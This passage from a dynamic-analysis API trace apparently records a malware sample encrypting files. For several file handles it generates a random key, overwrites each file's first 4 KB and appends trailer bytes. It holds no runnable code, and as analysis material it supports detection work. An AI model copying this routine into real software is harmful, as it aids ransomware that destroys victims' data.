returned 1 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.916] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.916] WriteFile (in: hFile=0x774, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.916] WriteFile (in: hFile=0x774, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.916] GetProcessHeap () returned 0x4f10000 [0076.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.916] CloseHandle (hObject=0x774) returned 1 [0076.919] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 15 [0076.919] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.919] ReadFile (in: hFile=0x7c8, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.919] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.919] GetProcessHeap () returned 0x4f10000 [0076.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.919] GetProcessHeap () returned 0x4f10000 [0076.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.919] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.919] GetProcessHeap () returned 0x4f10000 [0076.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.919] ReadFile (in: hFile=0x7c8, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.985] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.985] WriteFile (in: hFile=0x7c8, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.985] GetProcessHeap () returned 0x4f10000 [0076.985] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.985] GetProcessHeap () returned 0x4f10000 [0076.985] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.985] GetProcessHeap () returned 0x4f10000 [0076.985] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.985] GetProcessHeap () returned 0x4f10000 [0076.985] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.985] GetProcessHeap () returned 0x4f10000 [0076.985] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.985] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.986] GetProcessHeap () returned 0x4f10000 [0076.986] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.987] GetProcessHeap () returned 0x4f10000 [0076.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.988] GetProcessHeap () returned 0x4f10000 [0076.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.989] GetProcessHeap () returned 0x4f10000 [0076.990] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.990] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.990] WriteFile (in: hFile=0x7c8, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.990] WriteFile (in: hFile=0x7c8, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.990] GetProcessHeap () returned 0x4f10000 [0076.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.990] CloseHandle (hObject=0x7c8) returned 1 [0077.022] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 16 [0077.022] SetFilePointerEx (in: hFile=0x794, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.022] ReadFile (in: hFile=0x794, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.022] SetFilePointerEx (in: hFile=0x794, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.022] GetProcessHeap () returned 0x4f10000 [0077.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.022] GetProcessHeap () returned 0x4f10000 [0077.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.022] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.022] GetProcessHeap () returned 0x4f10000 [0077.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.022] ReadFile (in: hFile=0x794, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.072] SetFilePointerEx (in: hFile=0x794, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.073] WriteFile (in: hFile=0x794, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.073] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.074] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.075] 